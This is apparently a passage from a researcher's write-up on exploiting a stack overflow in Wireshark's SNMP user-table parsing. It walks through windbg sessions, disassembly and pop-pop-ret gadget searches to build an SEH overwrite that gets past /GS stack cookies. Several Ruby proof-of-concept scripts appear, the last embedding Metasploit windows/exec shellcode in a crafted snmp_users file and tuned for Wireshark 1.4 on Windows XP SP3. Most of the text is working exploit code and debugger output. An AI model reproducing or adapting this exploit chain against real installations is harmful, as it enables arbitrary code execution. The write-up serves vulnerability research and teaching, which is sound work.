0012ff18 00420a81 00000001 02c63fc8 00000008 wireshark!main+0x6b8
0012ff30 00521bae 00400000 00000000 0015233b wireshark!WinMain+0x61
0012ffc0 7c817067 0142d8b0 00000018 7ffd4000 wireshark!__tmainCRTStartup+0x140
0012fff0 00000000 00521d8d 00000000 78746341 kernel32!RegisterWaitForInputIdle+0x49
As you can see in red, we've overwritten our return address, as well as some of the current and previous function's arguments with our engineID data. The reason we didn't see an exception like this
(304.7a8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0165ef54 ebx=00000000 ecx=008bfc50 edx=04e71000 esi=00151f0a edi=005fe5cc
eip=aaaaaaaa esp=0012fb8c ebp=0012fba8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010202
aaaaaaaa ??              ???
is that wireshark was compiled with the /GS flag, meaning that there are stack cookies, as you can see below in red:
libwireshark!snmp_usm_password_to_key_sha1:
008bfc50 55              push    ebp
008bfc51 8bec            mov     ebp,esp
008bfc53 81ecc0000000    sub     esp,0C0h
008bfc59 a118802102      mov     eax,dword ptr [libwireshark!__security_cookie (02218018)]
008bfc5e 33c5            xor     eax,ebp
008bfc60 8945f0          mov     dword ptr [ebp-10h],eax
008bfc63 c745a400000000  mov     dword ptr [ebp-5Ch],0
008bfc6a c745fc00000000  mov     dword ptr [ebp-4],0
008bfc71 8d8540ffffff    lea     eax,[ebp-0C0h]
008bfc77 50              push    eax
008bfc78 e88310e3ff      call    libwireshark!sha1_starts (006f0d00)
...
008bfd63 83c40c          add     esp,0Ch
008bfd66 8b4d18          mov     ecx,dword ptr [ebp+18h]
008bfd69 51              push    ecx
008bfd6a 8d9540ffffff    lea     edx,[ebp-0C0h]
008bfd70 52              push    edx
008bfd71 e85a2ee3ff      call    libwireshark!sha1_finish (006f2bd0)
008bfd76 83c408          add     esp,8
008bfd79 8b4df0          mov     ecx,dword ptr [ebp-10h]
008bfd7c 33cd            xor     ecx,ebp
008bfd7e e85d817b00      call    libwireshark!__security_check_cookie (01077ee0)
008bfd83 8be5            mov     esp,ebp
008bfd85 5d              pop     ebp
008bfd86 c3              ret
The method I used to get around this is the classic overwrite-an-SEH-handler-with-an-address-to-a-pop-pop-ret. I also needed to trigger an exception before the call to __security_check_cookie so that the exception handlers would be called before the cookie was ever checked. The first thing I needed to figure out was how long the engineID needed to be in order to overwrite the SEH address on the stack. You can view the SEH chain in windbg like this:
0:000> bu libwireshark!snmp_usm_password_to_key_sha1              # set the breakpoint
0:000> g                                                          # continue execution
...
0:000> !exchain                                                   # display the SEH chain
0012ffb0: wireshark!_except_handler4+0 (00522555)
0012ffe0: kernel32!_except_handler3+0 (7c839ac0)
  CRT scope  0, filter: kernel32!BaseProcessStart+29 (7c843882)
                func:   kernel32!BaseProcessStart+3a (7c843898)
Invalid exception stack at ffffffff
!exchain says the address of the next SEH structure is at 0x12ffb0. This means the actual address of the next exception handler is at 0x12ffb4. Knowing the address on the stack that needed to be overwritten (0x12ffb4), all I needed to know before I could calculate the length of the engineID was the start address of the overflowed buffer. This is easy enough to do if you set a breakpoint on the vulnerable memcpy. (when I can, I prefer calculating things rather than using metasploit patterns):
0:000> bp 008bfd10
0:000> g
...
# disassembly
008bfd10 83c40c          add     esp,0Ch
008bfd13 8b4514          mov     eax,dword ptr [ebp+14h]
008bfd16 50              push    eax
008bfd17 8b4d10          mov     ecx,dword ptr [ebp+10h]
008bfd1a 51              push    ecx
008bfd1b 8d55bc          lea     edx,[ebp-44h]
008bfd1e 52              push    edx
008bfd1f e8d8817b00      call    libwireshark!memcpy (01077efc)
In my testing, edx (the dst buffer) pointed to 0x12fb44. Thus, the total length to overwrite up to the exception handler address would be 0x12ffb4-0x12fb44 = 1136. Now, since the data in the engineID is supposed to be a hex value and gets converted from hex into binary data, we'll need twice as much, so we'll need an engineID that is 2272 bytes long to overflow up to (not including) the pointer to the next SEH handler code. New ruby code:
def flip_dword(str)
 [str.hex].pack("V").scan(/./m).map{|b| "%02x" % b[0] }.join
end

engine_id = "90" * 1136
engine_id += flip_dword("beefface")

File.open("#{ENV['APPDATA']}\\Wireshark\\snmp_users","w") do |file|
 file.write(engine_id + ',"username","SHA1","password","DES","password"' + "\n")
end
Before/after memcpy (break at 008bfd10):
========================== BEFORE ============================     |=========================== AFTER ============================
0012ff88 00000000                                                  |0012ff88 90909090 
0012ff8c 00000000                                                  |0012ff8c 90909090 
0012ff90 ffffffff                                                  |0012ff90 90909090 
0012ff94 ffffffff                                                  |0012ff94 90909090 
0012ff98 ffffffff                                                  |0012ff98 90909090 
0012ff9c 0012ffac                                                  |0012ff9c 90909090 
0012ffa0 00151f0a                                                  |0012ffa0 90909090 
0012ffa4 00000000                                                  |0012ffa4 90909090 
0012ffa8 0012ff48                                                  |0012ffa8 90909090 
0012ffac 70b782cc                                                  |0012ffac 90909090 
0012ffb0 0012ffe0                                                  |0012ffb0 90909090 
0012ffb4 00522555 wireshark!_except_handler4                       |0012ffb4 beefface <--- Overwritten exception handler
0012ffb8 5abbc6d5                                                  |0012ffb8 5abbc6d5 
0012ffbc 00000001                                                  |0012ffbc 00000001 
0012ffc0 0012fff0                                                  |0012ffc0 0012fff0 
0012ffc4 7c817067 kernel32!BaseProcessStart+0x23                   |0012ffc4 7c817067 kernel32!BaseProcessStart+0x23
0012ffc8 00cdf6f2 libwireshark!dissect_hclnfsd_lock_call+0x102     |0012ffc8 00cdf6f2 libwireshark!dissect_hclnfsd_lock_call+0x102
0012ffcc 00cdf776 libwireshark!dissect_hclnfsd_lock_reply+0x76     |0012ffcc 00cdf776 libwireshark!dissect_hclnfsd_lock_reply+0x76
0012ffd0 7ffd5000                                                  |0012ffd0 7ffd5000 
0012ffd4 8054b6b8                                                  |0012ffd4 8054b6b8 
0012ffd8 0012ffc8                                                  |0012ffd8 0012ffc8 
0012ffdc 82188a80                                                  |0012ffdc 82188a80
Just to show that we overwrote the correct SEH pointer in memory, you'll see this error in windbg:
(2e0.434): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=beefface edx=7c9032bc esi=00000000 edi=00000000
eip=beefface esp=0012f6dc ebp=0012f6fc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
beefface ??              ???
Now that we've got that working, we've got to make sure we raise an error before the stack cookie is checked. But wait, it just worked, so what error are we raising? The actual error when overflowing mainly with nops is this:
(16c.660): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=909090a4 ebx=00000000 ecx=00000005 edx=00000000 esi=90909090 edi=90a38bd4
eip=7855af58 esp=0012faac ebp=0012fab4 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010293
MSVCR90!UnwindUpVec+0x30:
7855af58 8b448eec        mov     eax,dword ptr [esi+ecx*4-14h] ds:0023:90909090=????????
...
0:000> kb
ChildEBP RetAddr  Args to Child              
0012fab4 008bfd3a 90a38bd4 90909090 00000014 MSVCR90!UnwindUpVec+0x30
0012fb88 90909090 90909090 90909090 90909090 libwireshark!snmp_usm_password_to_key_sha1+0xea
...
# disassembly around 008bfd3a
008bfd17 8b4d10          mov     ecx,dword ptr [ebp+10h]
008bfd1a 51              push    ecx
008bfd1b 8d55bc          lea     edx,[ebp-44h]
008bfd1e 52              push    edx
008bfd1f e8d8817b00      call    libwireshark!memcpy (01077efc)
008bfd24 83c40c          add     esp,0Ch
008bfd27 6a14            push    14h
008bfd29 8b4518          mov     eax,dword ptr [ebp+18h]
008bfd2c 50              push    eax
008bfd2d 8b4d14          mov     ecx,dword ptr [ebp+14h]
008bfd30 8d540dbc        lea     edx,[ebp+ecx-44h]
008bfd34 52              push    edx
008bfd35 e8c2817b00      call    libwireshark!memcpy (01077efc)
008bfd3a 83c40c          add     esp,0Ch
What's happening is that we overwrote the "key" parameter to the snmp_usm_password_to_key_sha1 function with nops (\x90). Thus, when the third memcpy is called, it tries to read data from an invalid address (0x90909090):
3096     memcpy(password_buf, key, 20);
3097     memcpy(password_buf+20, engineID, engineLength);
3098     memcpy(password_buf+20+engineLength, key, 20);
Another possible way to generate an error would be to mess with the the engineLength variable, which also comes after the overflowable buffer on the stack. Anyway you do it, you just have to trigger some type of exception. The next thing to do is find a useful address that we can overwrite the SEH address with. Before an SEH handler is read from the stack and called, it must pass several checks (checks are made in ntdll!RtlDispatchException). I'd suggest reading this tutorial by corelanc0d3r (or you could just study ntdll!RtlDispatchException). I used msfpescan to find an address in libwireshark.dll that had the instructions pop-pop-ret. Why pop-pop-ret? If you look at the stack right after our exception handler is called, you'll see this:
ntdll!ExecuteHandler2:
7c903282 55              push    ebp
7c903283 8bec            mov     ebp,esp
7c903285 ff750c          push    dword ptr [ebp+0Ch]
7c903288 52              push    edx
7c903289 64ff3500000000  push    dword ptr fs:[0]
7c903290 64892500000000  mov     dword ptr fs:[0],esp
7c903297 ff7514          push    dword ptr [ebp+14h]
7c90329a ff7510          push    dword ptr [ebp+10h]
7c90329d ff750c          push    dword ptr [ebp+0Ch]
7c9032a0 ff7508          push    dword ptr [ebp+8]
7c9032a3 8b4d18          mov     ecx,dword ptr [ebp+18h]
7c9032a6 ffd1            call    ecx {beefface}             <-- calling our exception handler
...
# stack after the call (esp in the memory window in windbg)
0012f6dc 7c9032a8 ntdll!ExecuteHandler2+0x26
0012f6e0 0012f7c4 
0012f6e4 0012ffb0 
0012f6e8 0012f7e0 
0012f6ec 0012f798 
0012f6f0 0012ffb0 
0012f6f4 7c9032bc ntdll!ExecuteHandler2+0x3a
0012f6f8 0012ffb0 
0012f6fc 0012f7ac 
0012f700 7c90327a ntdll!ExecuteHandler+0x24
0012f704 0012f7c4
Notice anything familiar about that 0012ffb0 address, third down from the top? That's the address of the SEH structure on the stack, the same one we had overwritten with our nops. Thus, if we point the exception handler to a pop-pop-ret, it will pop the first two dwords off the stack (7c9032a8 and 0012f7c4) and return to the third (0012ffb0), which lands eip in instructions that we control. As I mentioned earlier, I used msfpescan to find the pop-pop-rets for me:
-n4g-[ snmpuser ]-$ msfpescan -p libwireshark.dll 

[libwireshark.dll]
0x10003998 pop esi; pop ebp; ret
0x10008240 pop esi; pop ebp; ret
0x1000a530 pop esi; pop ebp; ret
0x1000b510 pop esi; pop ebp; ret
0x1000b890 pop esi; pop ebp; ret
0x1006cb02 pop esi; pop ebp; ret
0x1006cc09 pop ebx; pop edi; ret
0x1006cc0f pop ebx; pop edi; ret
0x103e8404 pop eax; pop eax; ret
0x104022de pop esi; pop edx; retn 0x83ff
0x104024dd pop edi; pop eax; retn 0x83ff
0x10428a8d pop edi; pop ebp; retn 0x83ff
0x1055b972 pop esi; pop ebp; ret
0x1055bae2 pop esi; pop ebp; ret
0x10696426 pop ebx; pop ebp; ret
0x1070a8ee pop eax; pop ebx; retn 0x8b10
0x10748e94 pop esi; pop ebp; ret
0x10909c11 pop esi; pop ebp; ret
0x109f7e89 pop ecx; pop ecx; ret
0x109f7ed5 pop ecx; pop ebp; retn 0x000c
0x109f8055 pop esi; pop edi; retn 0x0010
0x109f8273 pop esi; pop ebx; retn 0x0010
0x109f856b pop edi; pop esi; ret
0x109f8591 pop edi; pop esi; ret
0x109f8631 pop ebx; pop ebp; ret
Any of the above addresses should work, but if you try and verify them in the disassembler in windbg, you won't see any pop-pop-rets. Why not? The output above was assuming libwireshark.dll started at a offset 0x10000000, which it doesn't. To view information about loaded modules in windbg, you could do something like this:
0:000> lml
start    end        module name
00380000 003f6000   libgcrypt_11   (export symbols) ...
00400000 00677000   wireshark   (private pdb symbols) ...
00680000 0262f000   libwireshark C (private pdb symbols) ...
026e0000 026fe000   lua5_1   C (export symbols) ...
685c0000 686be000   libglib_2_0_0   (export symbols) ...
77c10000 77c68000   msvcrt     (pdb symbols) ...
78520000 785c3000   MSVCR90    (private pdb symbols) ...
7c800000 7c8f6000   kernel32   (pdb symbols) ...
7c900000 7c9af000   ntdll      (pdb symbols) ...
You can see that libwireshark starts at offset 0x00680000, and not the 0x10000000 that msfpescan was assuming. This is what it should look like:
-n4g-[ snmpuser ]-$ msfpescan -p libwireshark.dll -I 0x680000

[libwireshark.dll]
0x00683998 pop esi; pop ebp; ret
0x00688240 pop esi; pop ebp; ret
0x0068a530 pop esi; pop ebp; ret
0x0068b510 pop esi; pop ebp; ret
0x0068b890 pop esi; pop ebp; ret
0x006ecb02 pop esi; pop ebp; ret
0x006ecc09 pop ebx; pop edi; ret
0x006ecc0f pop ebx; pop edi; ret
0x00a68404 pop eax; pop eax; ret
0x00a822de pop esi; pop edx; retn 0x83ff
0x00a824dd pop edi; pop eax; retn 0x83ff
0x00aa8a8d pop edi; pop ebp; retn 0x83ff
0x00bdb972 pop esi; pop ebp; ret
0x00bdbae2 pop esi; pop ebp; ret
0x00d16426 pop ebx; pop ebp; ret
0x00d8a8ee pop eax; pop ebx; retn 0x8b10
0x00dc8e94 pop esi; pop ebp; ret
0x00f89c11 pop esi; pop ebp; ret
0x01077e89 pop ecx; pop ecx; ret
0x01077ed5 pop ecx; pop ebp; retn 0x000c
0x01078055 pop esi; pop edi; retn 0x0010
0x01078273 pop esi; pop ebx; retn 0x0010
0x0107856b pop edi; pop esi; ret
0x01078591 pop edi; pop esi; ret
0x01078631 pop ebx; pop ebp; ret
Any of the above addresses should work, so I used the first one (00683998). Changing our ruby code to use this address gives us
def flip_dword(str)
 [str.hex].pack("V").scan(/./m).map{|b| "%02x" % b[0] }.join
end

engine_id = "90" * 1136
engine_id += flip_dword("00683998")

File.open("#{ENV['APPDATA']}\\Wireshark\\snmp_users","w") do |file|
 file.write(engine_id + ',"username","SHA1","password","DES","password"' + "\n")
end
Running wireshark again shows us landing back into our data after our pop-pop-ret handler was called:
0012ffb0 90              nop
0012ffb1 90              nop
0012ffb2 90              nop
0012ffb3 90              nop
0012ffb4 98              cwde
0012ffb5 396800          cmp     dword ptr [eax],ebp
0012ffb8 ffad5a910100    jmp     fword ptr [ebp+1915Ah]
0012ffbe 0000            add     byte ptr [eax],al
0012ffc0 f0ff12          lock call dword ptr [edx
Notice that we have four bytes of instructions we can use before we have to execute the address of our SEH handler (0012ffb4 and 0012ffb5). Since we don't really want to have to execute those instructions, we can put a short jmp at 0012ffb2 (two bytes) to jump over to 0012ffb8 into instructions we can control again. I tried putting the shellcode after 0012ffb8, but it gets truncated/messed with somewhere along the way, so I ended up putting it back before 0012ffb0 and using the first short jmp to jmp over the SEH handler address, and then a second near jmp (required 5 bytes) to jmp back to the start of my shellcode. I used msfpayload to generate the shellcode for calc.exe:
-n4g-[ snmpuser ]-$ msfpayload windows/exec CMD=calc.exe y
# windows/exec - 200 bytes
# http://www.metasploit.com
# EXITFUNC=process, CMD=calc.exe
buf = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" +
"\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95" +
"\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e" +
"\x65\x78\x65\x00"
The ruby poc code now looks like this:
def flip_dword(str)
 [str.hex].pack("V").scan(/./m).map{|b| "%02x" % b[0] }.join
end
def to_hex(str)
 str.scan(/./m).map{|b| "%02x" % b[0]}.join
end
# jmp short
def jmp_eb(len)
 "\xeb" + len.chr
end
# jmp near
def jmp_e9(len)
 "\xe9" + [len].pack("V")
end

# windows/exec - 200 bytes
# http://www.metasploit.com
# EXITFUNC=process, CMD=calc.exe
shellcode = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" +
"\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95" +
"\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e" +
"\x65\x78\x65\x00"
shellcode += "\x90\x90" + jmp_eb(4) # jmp past the SEH address

nop_length = 1136 - shellcode.length
engine_id = "90" * nop_length
engine_id += to_hex(shellcode)
engine_id += flip_dword("00683998") # pop-pop-ret in libwireshark.dll
engine_id += to_hex(jmp_e9(-(engine_id.length / 2 - nop_length + 5))) # the jmp_e9 is 5 bytes long

File.open("#{ENV['APPDATA']}\\Wireshark\\snmp_users","w") do |file|
 file.write(engine_id + ',"username","SHA1","password","DES","password"' + "\n")
end
This poc now pops calc, but only on the dev build of wireshark that I used though. To get this to work on wireshark 1.4, I had to change the pop-pop-ret address, as well as the amount to overflow the buffer with in order to overwrite the SEH handler. The code below works fine for me in XP SP3 with the default install of Wireshark 1.4:
def flip_dword(str)
 [str.hex].pack("V").scan(/./m).map{|b| "%02x" % b[0] }.join
end
def to_hex(str)
 str.scan(/./m).map{|b| "%02x" % b[0]}.join
end
# jmp short
def jmp_eb(len)
 "\xeb" + len.chr
end
# jmp near
def jmp_e9(len)
 "\xe9" + [len].pack("V")
end

# windows/exec - 200 bytes
# http://www.metasploit.com
# EXITFUNC=process, CMD=calc.exe
shellcode = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" +
"\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95" +
"\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e" +
"\x65\x78\x65\x00"
shellcode += "\x90\x90" + jmp_eb(4) # jmp past the SEH address
# nop_length = 1136 - shellcode.length # wireshark 1.5
nop_length = 1128 - shellcode.length # wireshark 1.4
engine_id = "90" * nop_length
engine_id += to_hex(shellcode)
engine_id += flip_dword("00653998") # pop-pop-ret in libwireshark.dll (1.4)
# engine_id += flip_dword("00683998") # pop-pop-ret in libwireshark.dll (1.5)
engine_id += to_hex(jmp_e9(-(engine_id.length / 2 - nop_length + 5))) # the jmp_e9 is 5 bytes long

File.open("#{ENV['APPDATA']}\\Wireshark\\snmp_users","w") do |file|
 file.write(engine_id + ',"username","SHA1","password","DES","password"' + "\n")
end
This was fun, but too bad you can only pwn yourself though.

Lessons learned:
  1. Don't copy and paste code
  2. If you must copy and paste code, at least read the comments